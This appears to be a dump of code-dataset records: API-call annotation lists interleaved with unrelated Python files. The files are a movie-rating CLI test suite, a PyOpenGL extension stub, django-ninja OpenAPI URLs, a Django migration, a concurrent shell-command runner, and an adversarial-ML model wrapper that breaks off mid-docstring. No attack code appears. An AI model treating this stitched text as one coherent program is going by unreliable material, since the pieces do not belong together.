crop_row, crop_col))\n', (1756, 1809), True, 'import numpy as np\n'), ((2375, 2387), 'keras.models.Sequential', 'Sequential', ([], {}), '()\n', (2385, 2387), False, 'from keras.models import Sequential\n'), ((3837, 3891), 'keras.optimizers.SGD', 'SGD', ([], {'lr': '(0.01)', 'decay': '(1e-06)', 'momentum': '(0.9)', 'nesterov': '(True)'}), '(lr=0.01, decay=1e-06, momentum=0.9, nesterov=True)\n', (3840, 3891), False, 'from keras.optimizers import SGD\n'), ((4587, 4606), 'keras.datasets.cifar10.load_data', 'cifar10.load_data', ([], {}), '()\n', (4604, 4606), False, 'from keras.datasets import cifar10\n'), ((5214, 5226), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (5224, 5226), True, 'import matplotlib.pyplot as plt\n'), ((7873, 7907), 'numpy.savetxt', 'np.savetxt', (['"""mean"""', 'mean'], {'fmt': '"""%f"""'}), "('mean', mean, fmt='%f')\n", (7883, 7907), True, 'import numpy as np\n'), 
((7914, 7946), 'numpy.savetxt', 'np.savetxt', (['"""std"""', 'std'], {'fmt': '"""%f"""'}), "('std', std, fmt='%f')\n", (7924, 7946), True, 'import numpy as np\n'), ((7953, 7999), 'numpy.savetxt', 'np.savetxt', (['"""covariance"""', 'covariance'], {'fmt': '"""%f"""'}), "('covariance', covariance, fmt='%f')\n", (7963, 7999), True, 'import numpy as np\n'), ((2683, 2701), 'keras.layers.Activation', 'Activation', (['"""relu"""'], {}), "('relu')\n", (2693, 2701), False, 'from keras.layers import Dense, Dropout, Activation, Flatten\n'), ((2869, 2887), 'keras.layers.Activation', 'Activation', (['"""relu"""'], {}), "('relu')\n", (2879, 2887), False, 'from keras.layers import Dense, Dropout, Activation, Flatten\n'), ((2903, 2933), 'keras.layers.MaxPooling2D', 'MaxPooling2D', ([], {'pool_size': '(2, 2)'}), '(pool_size=(2, 2))\n', (2915, 2933), False, 'from keras.layers import Convolution2D, MaxPooling2D\n'), ((3153, 3171), 'keras.layers.Activation', 'Activation', (['"""relu"""'], {}), "('relu')\n", (3163, 3171), False, 'from keras.layers import Dense, Dropout, Activation, Flatten\n'), ((3339, 3357), 'keras.layers.Activation', 'Activation', (['"""relu"""'], {}), "('relu')\n", (3349, 3357), False, 'from keras.layers import Dense, Dropout, Activation, Flatten\n'), ((3373, 3403), 'keras.layers.MaxPooling2D', 'MaxPooling2D', ([], {'pool_size': '(2, 2)'}), '(pool_size=(2, 2))\n', (3385, 3403), False, 'from keras.layers import Convolution2D, MaxPooling2D\n'), ((3451, 3460), 'keras.layers.Flatten', 'Flatten', ([], {}), '()\n', (3458, 3460), False, 'from keras.layers import Dense, Dropout, Activation, Flatten\n'), ((3558, 3576), 'keras.layers.Activation', 'Activation', (['"""relu"""'], {}), "('relu')\n", (3568, 3576), False, 'from keras.layers import Dense, Dropout, Activation, Flatten\n'), ((3592, 3604), 'keras.layers.Dropout', 'Dropout', (['(0.5)'], {}), '(0.5)\n', (3599, 3604), False, 'from keras.layers import Dense, Dropout, Activation, Flatten\n'), ((3709, 3730), 
'keras.layers.Activation', 'Activation', (['"""softmax"""'], {}), "('softmax')\n", (3719, 3730), False, 'from keras.layers import Dense, Dropout, Activation, Flatten\n'), ((6636, 6681), 'numpy.reshape', 'np.reshape', (['activation', '(num, col * map_size)'], {}), '(activation, (num, col * map_size))\n', (6646, 6681), True, 'import numpy as np\n'), ((6911, 6962), 'numpy.reshape', 'np.reshape', (['trans_activation', '(col, num * map_size)'], {}), '(trans_activation, (col, num * map_size))\n', (6921, 6962), True, 'import numpy as np\n'), ((7182, 7231), 'numpy.mean', 'np.mean', (['matrix_activation'], {'axis': '(0)', 'keepdims': '(True)'}), '(matrix_activation, axis=0, keepdims=True)\n', (7189, 7231), True, 'import numpy as np\n'), ((7300, 7348), 'numpy.std', 'np.std', (['matrix_activation'], {'axis': '(0)', 'keepdims': '(True)'}), '(matrix_activation, axis=0, keepdims=True)\n', (7306, 7348), True, 'import numpy as np\n'), ((7571, 7613), 'numpy.mean', 'np.mean', (['activation'], {'axis': '(0)', 'keepdims': '(True)'}), '(activation, axis=0, keepdims=True)\n', (7578, 7613), True, 'import numpy as np\n'), ((7682, 7723), 'numpy.std', 'np.std', (['activation'], {'axis': '(0)', 'keepdims': '(True)'}), '(activation, axis=0, keepdims=True)\n', (7688, 7723), True, 'import numpy as np\n'), ((2599, 2608), 'keras.regularizers.l2', 'l2', ([], {'l': '(0.0)'}), '(l=0.0)\n', (2601, 2608), False, 'from keras.regularizers import l2, activity_l1l2\n'), ((2656, 2665), 'keras.regularizers.l2', 'l2', ([], {'l': '(0.0)'}), '(l=0.0)\n', (2658, 2665), False, 'from keras.regularizers import l2, activity_l1l2\n'), ((2785, 2794), 'keras.regularizers.l2', 'l2', ([], {'l': '(0.0)'}), '(l=0.0)\n', (2787, 2794), False, 'from keras.regularizers import l2, activity_l1l2\n'), ((2842, 2851), 'keras.regularizers.l2', 'l2', ([], {'l': '(0.0)'}), '(l=0.0)\n', (2844, 2851), False, 'from keras.regularizers import l2, activity_l1l2\n'), ((3069, 3078), 'keras.regularizers.l2', 'l2', ([], {'l': '(0.0)'}), 
'(l=0.0)\n', (3071, 3078), False, 'from keras.regularizers import l2, activity_l1l2\n'), ((3126, 3135), 'keras.regularizers.l2', 'l2', ([], {'l': '(0.0)'}), '(l=0.0)\n', (3128, 3135), False, 'from keras.regularizers import l2, activity_l1l2\n'), ((3255, 3264), 'keras.regularizers.l2', 'l2', ([], {'l': '(0.0)'}), '(l=0.0)\n', (3257, 3264), False, 'from keras.regularizers import l2, activity_l1l2\n'), ((3312, 3321), 'keras.regularizers.l2', 'l2', ([], {'l': '(0.0)'}), '(l=0.0)\n', (3314, 3321), False, 'from keras.regularizers import l2, activity_l1l2\n'), ((3503, 3512), 'keras.regularizers.l2', 'l2', ([], {'l': '(0.0)'}), '(l=0.0)\n', (3505, 3512), False, 'from keras.regularizers import l2, activity_l1l2\n'), ((3531, 3540), 'keras.regularizers.l2', 'l2', ([], {'l': '(0.0)'}), '(l=0.0)\n', (3533, 3540), False, 'from keras.regularizers import l2, activity_l1l2\n'), ((3654, 3663), 'keras.regularizers.l2', 'l2', ([], {'l': '(0.0)'}), '(l=0.0)\n', (3656, 3663), False, 'from keras.regularizers import l2, activity_l1l2\n'), ((3682, 3691), 'keras.regularizers.l2', 'l2', ([], {'l': '(0.0)'}), '(l=0.0)\n', (3684, 3691), False, 'from keras.regularizers import l2, activity_l1l2\n'), ((4504, 4522), 'keras.backend.learning_phase', 'K.learning_phase', ([], {}), '()\n', (4520, 4522), True, 'from keras import backend as K\n'), ((7810, 7841), 'numpy.transpose', 'np.transpose', (['normalized_output'], {}), '(normalized_output)\n', (7822, 7841), True, 'import numpy as np\n'), ((7442, 7473), 'numpy.transpose', 'np.transpose', (['normalized_output'], {}), '(normalized_output)\n', (7454, 7473), True, 'import numpy as np\n')] |
import unittest
import subprocess
import re
from os import environ
class MoveRatingTestBasic(unittest.TestCase):
    """Black-box tests for the movie_rating.py command-line tool.

    Every test shells out to /usr/src/app/movie_rating.py, which requires a
    valid OMDB API key in the environment.
    """

    def setUp(self):
        # Fail fast when the key is missing or empty -- no test can pass without it.
        if not environ.get('OMDB_API_KEY'):
            raise Exception("The OMDB_API_KEY environment variable is not set. Unable to run tests without it")

    def test_existing_movie(self):
        p = self._movie_rating_cmd("--title 'Guardians of the Galaxy'")
        rating = p.stdout.rstrip()
        self.assertTrue(re.match(r'^\d\d%$', rating), "Existing movie has a rating ({})".format(p.stdout))

    def test_existing_movie_bad_year(self):
        p = self._movie_rating_cmd("--title 'Guardians of the Galaxy' --year 1999")
        self.assertNotEqual(p.returncode, 0, "Non-zero return code")
        # Bug fix: the original message contained an unfilled "{}" placeholder;
        # assertEqual also reports the actual stdout on failure.
        self.assertEqual(p.stdout, "", "Bad Year doesn't have a rating ({})".format(p.stdout))
        error = p.stderr.rstrip()
        self.assertEqual("We're sorry, but a movie by that name (Guardians of the Galaxy) in that year (1999) was not found", error, "Correct error for bad year")

    def test_typo_movie(self):
        p = self._movie_rating_cmd("--title 'Napolean Dynamite'")
        self.assertNotEqual(p.returncode, 0, "Non-zero return code")
        # Bug fix: same unfilled "{}" placeholder as above.
        self.assertEqual(p.stdout, "", "Typo doesn't have a rating ({})".format(p.stdout))
        error = p.stderr.rstrip()
        self.assertEqual("We're sorry, but a movie by that name (Napolean Dynamite) was not found", error, "Correct error for typo movie")

    def test_missing_title(self):
        p = self._movie_rating_cmd("")
        self.assertNotEqual(p.returncode, 0, "Non-zero return code")
        # assertIn gives a clearer diff than assertTrue('x' in y) on failure.
        self.assertIn('arguments are required: --title', p.stderr, "Correct error for missing title")

    def test_invalid_year(self):
        p = self._movie_rating_cmd("--title Foo --year 200a")
        self.assertNotEqual(p.returncode, 0, "Non-zero return code")
        self.assertIn('--year: invalid int value', p.stderr, "Correct error for invalid year")

    def test_invalid_api_key(self):
        # Bypass the helper so an explicit (bad) API key can be supplied.
        p = subprocess.run("/usr/src/app/movie_rating.py --api-key foo --title foo", shell=True, capture_output=True, text=True)
        self.assertNotEqual(p.returncode, 0, "Non-zero return code")
        self.assertIn("API Key was not valid", p.stderr, "Correct error for invalid api-key")

    def _movie_rating_cmd(self, args):
        """Run the CLI with *args* appended and return the CompletedProcess."""
        p = subprocess.run("/usr/src/app/movie_rating.py {}".format(args), shell=True, capture_output=True, text=True)
        return p
# Allow running this test module directly (e.g. "python <file>").
if __name__ == '__main__':
    unittest.main()
| [
"unittest.main",
"subprocess.run",
"re.match",
"os.environ.get"
] | [((2529, 2544), 'unittest.main', 'unittest.main', ([], {}), '()\n', (2542, 2544), False, 'import unittest\n'), ((2036, 2156), 'subprocess.run', 'subprocess.run', (['"""/usr/src/app/movie_rating.py --api-key foo --title foo"""'], {'shell': '(True)', 'capture_output': '(True)', 'text': '(True)'}), "('/usr/src/app/movie_rating.py --api-key foo --title foo',\n shell=True, capture_output=True, text=True)\n", (2050, 2156), False, 'import subprocess\n'), ((502, 531), 're.match', 're.match', (['"""^\\\\d\\\\d%$"""', 'rating'], {}), "('^\\\\d\\\\d%$', rating)\n", (510, 531), False, 'import re\n'), ((146, 173), 'os.environ.get', 'environ.get', (['"""OMDB_API_KEY"""'], {}), "('OMDB_API_KEY')\n", (157, 173), False, 'from os import environ\n'), ((189, 216), 'os.environ.get', 'environ.get', (['"""OMDB_API_KEY"""'], {}), "('OMDB_API_KEY')\n", (200, 216), False, 'from os import environ\n')] |
'''OpenGL extension ARB.shader_clock
This module customises the behaviour of the
OpenGL.raw.GL.ARB.shader_clock to provide a more
Python-friendly API
Overview (from the spec)
This extension exposes a 64-bit monotonically incrementing shader
counter which may be used to derive local timing information within
a single shader invocation.
The official definition of this extension is available here:
http://www.opengl.org/registry/specs/ARB/shader_clock.txt
'''
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GL import _types, _glgets
from OpenGL.raw.GL.ARB.shader_clock import *
from OpenGL.raw.GL.ARB.shader_clock import _EXTENSION_NAME
def glInitShaderClockARB():
    """Return a boolean indicating whether the GL_ARB_shader_clock extension is available."""
    from OpenGL import extensions
    is_available = extensions.hasGLExtension(_EXTENSION_NAME)
    return is_available
### END AUTOGENERATED SECTION | [
"OpenGL.extensions.hasGLExtension"
] | [((861, 903), 'OpenGL.extensions.hasGLExtension', 'extensions.hasGLExtension', (['_EXTENSION_NAME'], {}), '(_EXTENSION_NAME)\n', (886, 903), False, 'from OpenGL import extensions\n')] |
from functools import partial
from django.urls import path
from .views import openapi_json, swagger, home
def get_openapi_urls(api: "NinjaAPI"):
    """Build the URL patterns for the API root, the OpenAPI schema and the docs UI."""
    urls = [path("", partial(home, api=api), name=f"api-root")]

    if api.openapi_url:
        schema_route = path(
            api.openapi_url.lstrip("/"),
            partial(openapi_json, api=api),
            name="openapi-json",
        )
        urls.append(schema_route)
        # The schema and docs views cannot share one URL.
        assert api.openapi_url != api.docs_url, (
            "Please use different urls for openapi_url and docs_url"
        )

    if api.docs_url:
        docs_route = path(
            api.docs_url.lstrip("/"),
            partial(swagger, api=api),
            name="openapi-swagger",
        )
        urls.append(docs_route)

    return urls
| [
"functools.partial"
] | [((170, 192), 'functools.partial', 'partial', (['home'], {'api': 'api'}), '(home, api=api)\n', (177, 192), False, 'from functools import partial\n'), ((340, 370), 'functools.partial', 'partial', (['openapi_json'], {'api': 'api'}), '(openapi_json, api=api)\n', (347, 370), False, 'from functools import partial\n'), ((704, 729), 'functools.partial', 'partial', (['swagger'], {'api': 'api'}), '(swagger, api=api)\n', (711, 729), False, 'from functools import partial\n')] |
# -*- coding: utf-8 -*-
# Generated by Django 1.11.7 on 2017-12-29 18:33
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated by Django 1.11.7: adds a boolean flag to FieldType that
    # controls whether the field is displayed in the "About Place" section.
    dependencies = [
        ('places', '0027_auto_20171229_1606'),
    ]

    operations = [
        migrations.AddField(
            model_name='fieldtype',
            name='is_shown_in_about_place',
            field=models.BooleanField(default=False, verbose_name='Show in About Place section'),
        ),
    ]
| [
"django.db.models.BooleanField"
] | [((418, 496), 'django.db.models.BooleanField', 'models.BooleanField', ([], {'default': '(False)', 'verbose_name': '"""Show in About Place section"""'}), "(default=False, verbose_name='Show in About Place section')\n", (437, 496), False, 'from django.db import migrations, models\n')] |
from builtins import str
import collections
import contextlib
import functools
import itertools
import io
import os
import re
import six
import subprocess
import threading
import tempfile
import time
import traceback
import termcolor
from . import command
from . import parser
# Terminal colors handed out to concurrently running commands (see Runner.using_color).
COLORS = ['yellow', 'blue', 'red', 'green', 'magenta', 'cyan']
# Retry policy for transient IOError while writing to the terminal (see Runner.print_lines).
IO_ERROR_RETRY_INTERVAL = 0.1
IO_ERROR_RETRY_ATTEMPTS = 100
# Aggregate result of run_commands(): lists of failed / still-running commands,
# plus a flag set when a KeyboardInterrupt stopped the run.
RunnerResults = collections.namedtuple('RunnerResults', ('failed', 'running', 'interrupt'))
def print_exceptions(f):
    """Decorator that dumps a traceback to stdout before re-raising.

    Exceptions raised inside threads don't print a traceback by default, so
    thread targets are wrapped with this to make failures visible.
    """
    @functools.wraps(f)
    def inner(*args, **kwargs):
        try:
            result = f(*args, **kwargs)
        except:
            termcolor.cprint(traceback.format_exc(), 'red')
            print('-' * 20)
            raise
        return result
    return inner
# See https://bugs.python.org/issue1167930 for why thread join ignores interrupts
class InterruptibleThread(threading.Thread):
    """Thread whose join() polls so the main thread can still receive interrupts."""

    POLL_FREQ = 0.1

    def join(self, timeout=None):
        started_waiting = time.time()
        while True:
            # A falsy timeout (None or 0) means "wait until the thread dies".
            if timeout and time.time() - started_waiting >= timeout:
                return
            super(InterruptibleThread, self).join(timeout or self.POLL_FREQ)
            if not self.is_alive():
                return
class Runner(object):
    """Runs shell commands (possibly concurrently) with colored, prefixed output.

    Each command's stdout/stderr is captured to files under ``tmpdir`` and
    echoed to the terminal with a per-command color and prefix.
    """

    def __init__(self, tmpdir, environment, retry_interval=None, shell='/bin/bash',
                 output_timeout=None):
        """
        :param tmpdir: directory where per-command stdout/stderr logs are written.
        :param environment: dict of extra environment variables for child processes.
        :param retry_interval: default seconds to wait between retries.
        :param shell: shell executable used to run commands.
        :param output_timeout: default seconds of output silence before a command is killed.
        """
        self.tmpdir = tmpdir
        self._retry_interval = retry_interval
        self._shell = shell
        self._output_timeout = output_timeout
        self._procs_lock = threading.Lock()
        self._procs = []
        self._output_lock = threading.Lock()
        # Maps color name -> number of commands currently using it; ordered so
        # the least recently used color is picked first.
        self._colors = collections.OrderedDict((c, 0) for c in COLORS)
        self._color_lock = threading.Lock()
        self._environment = environment
        self._name_counts = {}
        self._dead = False
        self.threads_lock = threading.Lock()
        self.threads = collections.defaultdict(list)
        self._results = {}

    def kill_all(self):
        """ Kills all running threads """
        self._dead = True
        while True:  # Keep killing procs until the threads terminate
            with self.threads_lock:
                # Bug fix: Thread.isAlive() was removed in Python 3.9; is_alive()
                # has been available since Python 2.6 and is the supported name.
                if any(t.is_alive() for t in itertools.chain(*self.threads.values())):
                    with self._procs_lock:
                        for proc in self._procs:
                            proc.kill()
                    time.sleep(0.1)
                else:
                    return True

    @staticmethod
    def print_lines(lines, prefix, color, end=''):
        """Print each line with a prefix/color, retrying on transient IOError."""
        for line in lines:
            for _ in range(IO_ERROR_RETRY_ATTEMPTS):
                try:
                    termcolor.cprint(prefix + str(line), color, end=end)
                except IOError:
                    time.sleep(IO_ERROR_RETRY_INTERVAL)
                else:
                    break

    @property
    def env(self):
        """Environment for child processes: os.environ overlaid with the extras."""
        env = os.environ.copy()
        env.update(self._environment)
        return env

    @property
    def output_timeout(self):
        return self._output_timeout

    def print_command(self, cmd, prefix='', color='white', message='Running'):
        """Print a status line (or banner, for multi-line commands) for *cmd*."""
        with self._output_lock:  # Use a lock to keep output lines separate
            lines = cmd.split('\n')
            message += ': '
            if len(lines) > 1:
                lines = [message] + lines + ['---']
            else:
                lines = [message + lines[0]]
            self.print_lines(lines, '{}| '.format(prefix), color=color, end='\n')

    @contextlib.contextmanager
    def using_color(self):
        """Reserve a terminal color for the duration of the context."""
        with self._color_lock:
            # Pick the oldest color, favoring colors not in use.
            # Bug fix: the fallback used to iterate self._colors.items(), which
            # yields (color, count) tuples; when every color was busy, the tuple
            # was used as a key and self._colors.pop(color) raised KeyError.
            # Iterate the keys instead so the oldest color is reused.
            color = next(
                itertools.chain((c for c, count in self._colors.items() if count == 0),
                                iter(self._colors)))
            self._colors[color] = self._colors.pop(color) + 1  # Re-add at the end
        try:
            yield color
        finally:
            with self._color_lock:
                self._colors[color] -= 1

    def create_name(self, name, command):
        """Return a unique display/log name for a command ("name", "name_1", ...)."""
        if name:
            command_name = name
        else:
            # Default to the command's first word (raw string avoids the
            # invalid '\w' escape warning on modern Python).
            command_name = re.search(r'\w+', command).group(0)
        if command_name in self._name_counts:
            self._name_counts[command_name] += 1
            command_name = '{}_{}'.format(command_name, self._name_counts[command_name])
        else:
            self._name_counts[command_name] = 0
        return command_name

    def _run(self, command, name, start_time, color, skip=False, timeout=None, ignore_status=False,
             background=False, retries=0, interval=None):
        """Run one command (with retries), streaming its output; return pass/fail."""
        if skip:
            self.print_command(command.command, message='Skipping')
            return True
        interval = interval or self._retry_interval
        for attempt in range(0, retries + 1):
            command_name = self.create_name(name, command.command)
            stdout_path = os.path.join(self.tmpdir, '{}_{}.stdout'.format(command_name, attempt))
            stderr_path = os.path.join(self.tmpdir, '{}_{}.stderr'.format(command_name, attempt))
            # Writer handles feed the subprocess; reader handles tail the same
            # files so output can be echoed while the process runs.
            with io.open(stdout_path, 'wb') as stdout_writer, \
                    io.open(stdout_path, 'rb') as stdout_reader, \
                    io.open(stderr_path, 'wb') as stderr_writer, \
                    io.open(stderr_path, 'rb') as stderr_reader:
                # See http://stackoverflow.com/questions/4789837/how-to-terminate-a-python-subprocess-launched-with-shell-true  # noqa
                proc = subprocess.Popen(command.command, shell=True, executable=self._shell,
                                        stdout=stdout_writer, stderr=stderr_writer, env=self.env)
                with self._procs_lock:
                    self._procs.append(proc)
                prefix = name or str(proc.pid)
                self.print_command(
                    command.command,
                    message=('Retrying ({})'.format(attempt) if attempt > 0 else 'Running'),
                    prefix=prefix, color=color)
                last_output_time = time.time()

                def print_output():
                    # Echo any new output; returns True when something was printed.
                    with self._output_lock:
                        out = stdout_reader.readlines()
                        err = stderr_reader.readlines()
                        self.print_lines(out, '{}| '.format(prefix), color)
                        self.print_lines(err, '{}: '.format(prefix), color)
                    return bool(out or err)

                while proc.poll() is None:
                    saw_output = print_output()
                    current_time = time.time()
                    # Kill foreground commands that have been silent too long.
                    if (timeout is not None and current_time > last_output_time + timeout and
                            not background):
                        proc.kill()
                        termcolor.cprint('{}! OUTPUT TIMEOUT ({:0.1f}s)'.format(prefix, timeout),
                                         color, attrs=['bold'])
                    elif saw_output:
                        last_output_time = current_time
                    time.sleep(0.05)
                print_output()  # Flush anything emitted between the last poll and exit
                with self._procs_lock:
                    self._procs.remove(proc)
            passed = not bool(proc.returncode)
            if passed or self._dead:
                break
            elif attempt < retries:
                termcolor.cprint('{}| Retrying after {}s'.format(prefix, interval), color)
                time.sleep(interval)
        elapsed_time = time.time() - start_time
        if passed:
            message = 'Done'
        elif self._dead:
            message = 'Terminated'
        elif ignore_status:
            message = 'Failed'
        else:
            message = 'FAILED'
        termcolor.cprint('{}| {}'.format(prefix, message), attrs=(None if passed else ['bold']),
                         color=color, end='')
        termcolor.cprint(" {}({:0.1f}s)".format(
            '(ignored) ' if (not passed and ignore_status) else '', elapsed_time), color=color)
        return passed

    @functools.wraps(_run)
    def run(self, *args, **kwargs):
        """Run a command, reserving a color for the duration of the run."""
        with self.using_color() as color:
            return self._run(*args, color=color, **kwargs)

    @print_exceptions  # Ensure we see thread exceptions
    def _run_job(self, job, job_id, **kwargs):
        """Thread target: run *job* and record its result under *job_id*."""
        passed = job.run(**kwargs)
        self._results[job_id] = passed

    def start(self, cmd, job_id, shared_context):
        """ Start a job.

        Returns:
            True/False when a synchronous job passed/failed; None while the
            job is still running (background or named jobs).
        """
        self._results[job_id] = None
        job = command.Job(command=cmd)
        job.synchronous_prepare(shared_context)
        thread = InterruptibleThread(
            target=self._run_job,
            kwargs=dict(runner=self,
                        job=job,
                        job_id=job_id,
                        shared_context=shared_context))
        thread.daemon = True  # Ensure this thread doesn't outlive the main thread

        # Keep track of all running threads
        with self.threads_lock:
            if job.background:
                self.threads['background'].append(thread)
            else:
                self.threads['normal'].append(thread)
        thread.start()

        # Wait if command is synchronous
        if not (job.background or job.name):
            thread.join()
        return self._results.get(job_id)

    def finish(self):
        """ Waits for non-background jobs. """
        # Wait for all the non-background threads to complete
        for t in self.threads['normal']:
            t.join()

    def failures(self):
        """ Returns failed jobs """
        return [id for id, result in six.iteritems(self._results) if result is False]

    def running(self):
        """ Returns jobs that are still running jobs """
        return [id for id, result in six.iteritems(self._results) if result is None]
def run_commands(commands, retry_interval=None, shell='/bin/bash', tmpdir=None, output_timeout=None,
                 environment=None):
    """
    Args:
        commands: A list of commands
        retry_interval: Time between retries in seconds
        shell: Choice of shell
        tmpdir: temporary directory to store output logs (defaults to the
            system temp directory)
        output_timeout: Fail command if it takes longer than this number of seconds
        environment: Environment variables to use during command run

    Returns:
        RunnerResults (a tuple):
            A list of failed commands.
            A list of commands that are still running.
            Whether a KeyboardInterrupt stopped the run.
    """
    # Bug fix: the default used to be a mutable dict literal ({}); use None
    # as the sentinel to avoid the shared-mutable-default pitfall.
    if environment is None:
        environment = {}
    tmpdir = tmpdir or tempfile.gettempdir()
    # isinstance (rather than type(...) == list) also accepts list subclasses.
    assert isinstance(commands, list), (
        "Expected command list to be a list but got {}".format(type(commands)))
    job_runner = Runner(tmpdir=tmpdir, retry_interval=retry_interval, shell=shell,
                        environment=environment, output_timeout=output_timeout)
    shared_context = command.SharedContext()
    started_commands = {}

    def results(interrupt=False):
        # Translate recorded job ids back into the original command objects.
        return RunnerResults(
            failed=[started_commands[id] for id in job_runner.failures()],
            running=[started_commands[id] for id in job_runner.running()],
            interrupt=interrupt)

    job_id_counter = itertools.count()
    try:
        for cmd in parser.generate_commands(commands):
            job_id = next(job_id_counter)
            started_commands[job_id] = cmd
            result = job_runner.start(cmd, job_id=job_id, shared_context=shared_context)
            if result is False:  # A synchronous job failed; stop scheduling more
                break
        job_runner.finish()
        return results()
    except KeyboardInterrupt:
        return results(interrupt=True)
    finally:
        job_runner.kill_all()
| [
"traceback.format_exc",
"collections.OrderedDict",
"collections.namedtuple",
"threading.Lock",
"subprocess.Popen",
"functools.wraps",
"os.environ.copy",
"io.open",
"time.sleep",
"builtins.str",
"itertools.count",
"collections.defaultdict",
"tempfile.gettempdir",
"six.iteritems",
"time.ti... | [((422, 497), 'collections.namedtuple', 'collections.namedtuple', (['"""RunnerResults"""', "('failed', 'running', 'interrupt')"], {}), "('RunnerResults', ('failed', 'running', 'interrupt'))\n", (444, 497), False, 'import collections\n'), ((630, 648), 'functools.wraps', 'functools.wraps', (['f'], {}), '(f)\n', (645, 648), False, 'import functools\n'), ((8182, 8203), 'functools.wraps', 'functools.wraps', (['_run'], {}), '(_run)\n', (8197, 8203), False, 'import functools\n'), ((11384, 11401), 'itertools.count', 'itertools.count', ([], {}), '()\n', (11399, 11401), False, 'import itertools\n'), ((1081, 1092), 'time.time', 'time.time', ([], {}), '()\n', (1090, 1092), False, 'import time\n'), ((1632, 1648), 'threading.Lock', 'threading.Lock', ([], {}), '()\n', (1646, 1648), False, 'import threading\n'), ((1702, 1718), 'threading.Lock', 'threading.Lock', ([], {}), '()\n', (1716, 1718), False, 'import threading\n'), ((1742, 1789), 'collections.OrderedDict', 'collections.OrderedDict', (['((c, 0) for c in COLORS)'], {}), '((c, 0) for c in COLORS)\n', (1765, 1789), False, 'import collections\n'), ((1817, 1833), 'threading.Lock', 'threading.Lock', ([], {}), '()\n', (1831, 1833), False, 'import threading\n'), ((1960, 1976), 'threading.Lock', 'threading.Lock', ([], {}), '()\n', (1974, 1976), False, 'import threading\n'), ((2000, 2029), 'collections.defaultdict', 'collections.defaultdict', (['list'], {}), '(list)\n', (2023, 2029), False, 'import collections\n'), ((2992, 3009), 'os.environ.copy', 'os.environ.copy', ([], {}), '()\n', (3007, 3009), False, 'import os\n'), ((10737, 10758), 'tempfile.gettempdir', 'tempfile.gettempdir', ([], {}), '()\n', (10756, 10758), False, 'import tempfile\n'), ((7627, 7638), 'time.time', 'time.time', ([], {}), '()\n', (7636, 7638), False, 'import time\n'), ((5246, 5272), 'io.open', 'io.open', (['stdout_path', '"""wb"""'], {}), "(stdout_path, 'wb')\n", (5253, 5272), False, 'import io\n'), ((5313, 5339), 'io.open', 'io.open', 
(['stdout_path', '"""rb"""'], {}), "(stdout_path, 'rb')\n", (5320, 5339), False, 'import io\n'), ((5380, 5406), 'io.open', 'io.open', (['stderr_path', '"""wb"""'], {}), "(stderr_path, 'wb')\n", (5387, 5406), False, 'import io\n'), ((5447, 5473), 'io.open', 'io.open', (['stderr_path', '"""rb"""'], {}), "(stderr_path, 'rb')\n", (5454, 5473), False, 'import io\n'), ((5651, 5782), 'subprocess.Popen', 'subprocess.Popen', (['command.command'], {'shell': '(True)', 'executable': 'self._shell', 'stdout': 'stdout_writer', 'stderr': 'stderr_writer', 'env': 'self.env'}), '(command.command, shell=True, executable=self._shell,\n stdout=stdout_writer, stderr=stderr_writer, env=self.env)\n', (5667, 5782), False, 'import subprocess\n'), ((6202, 6213), 'time.time', 'time.time', ([], {}), '()\n', (6211, 6213), False, 'import time\n'), ((9859, 9887), 'six.iteritems', 'six.iteritems', (['self._results'], {}), '(self._results)\n', (9872, 9887), False, 'import six\n'), ((10027, 10055), 'six.iteritems', 'six.iteritems', (['self._results'], {}), '(self._results)\n', (10040, 10055), False, 'import six\n'), ((779, 801), 'traceback.format_exc', 'traceback.format_exc', ([], {}), '()\n', (799, 801), False, 'import traceback\n'), ((1122, 1133), 'time.time', 'time.time', ([], {}), '()\n', (1131, 1133), False, 'import time\n'), ((2494, 2509), 'time.sleep', 'time.sleep', (['(0.1)'], {}), '(0.1)\n', (2504, 2509), False, 'import time\n'), ((4266, 4292), 're.search', 're.search', (['"""\\\\w+"""', 'command'], {}), "('\\\\w+', command)\n", (4275, 4292), False, 'import re\n'), ((5938, 5951), 'builtins.str', 'str', (['proc.pid'], {}), '(proc.pid)\n', (5941, 5951), False, 'from builtins import str\n'), ((6734, 6745), 'time.time', 'time.time', ([], {}), '()\n', (6743, 6745), False, 'import time\n'), ((7197, 7213), 'time.sleep', 'time.sleep', (['(0.05)'], {}), '(0.05)\n', (7207, 7213), False, 'import time\n'), ((7582, 7602), 'time.sleep', 'time.sleep', (['interval'], {}), '(interval)\n', (7592, 7602), 
False, 'import time\n'), ((2860, 2895), 'time.sleep', 'time.sleep', (['IO_ERROR_RETRY_INTERVAL'], {}), '(IO_ERROR_RETRY_INTERVAL)\n', (2870, 2895), False, 'import time\n'), ((2781, 2790), 'builtins.str', 'str', (['line'], {}), '(line)\n', (2784, 2790), False, 'from builtins import str\n')] |
"""
Model construction utilities based on keras
"""
import warnings
from distutils.version import LooseVersion
import tensorflow.keras
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense, Activation, Flatten
# from cleverhans.model import Model, NoSuchLayerError
import tensorflow as tf
from abc import ABCMeta
class NoSuchLayerError(ValueError):
    """Error raised when a caller requests a layer the model does not expose."""
class AModel(object):
"""
An abstract interface for model wrappers that exposes model symbols
needed for making an attack. This abstraction removes the dependency on
any specific neural network package (e.g. Keras) from the core
code of CleverHans. It can also simplify exposing the hidden features of a
model when a specific package does not directly expose them.
"""
__metaclass__ = ABCMeta
O_LOGITS, O_PROBS, O_FEATURES = "logits probs features".split()
def __init__(
self, scope=None, nb_classes=None, hparams=None, needs_dummy_fprop=False
):
"""
Constructor.
:param scope: str, the name of model.
:param nb_classes: integer, the number of classes.
:param hparams: dict, hyper-parameters for the model.
:needs_dummy_fprop: bool, if True the model's parameters are not
created until fprop is called.
"""
self.scope = scope or self.__class__.__name__
self.nb_classes = nb_classes
self.hparams = hparams or {}
self.needs_dummy_fprop = needs_dummy_fprop
def __call__(self, *args, **kwargs):
"""
For compatibility with functions used as model definitions (taking
an input tensor and returning the tensor giving the output
of the model on that input).
"""
warnings.warn(
"Model.__call__ is deprecated. "
"The call is ambiguous as to whether the output should "
"be logits or probabilities, and getting the wrong one "
"can cause serious problems. "
"The output actually is probabilities, which are a very "
"dangerous thing to use as part of any interface for "
"cleverhans, because softmax probabilities are prone "
"to gradient masking."
"On or after 2019-04-24, this method will change to raise "
"an exception explaining why Model.__call__ should not be "
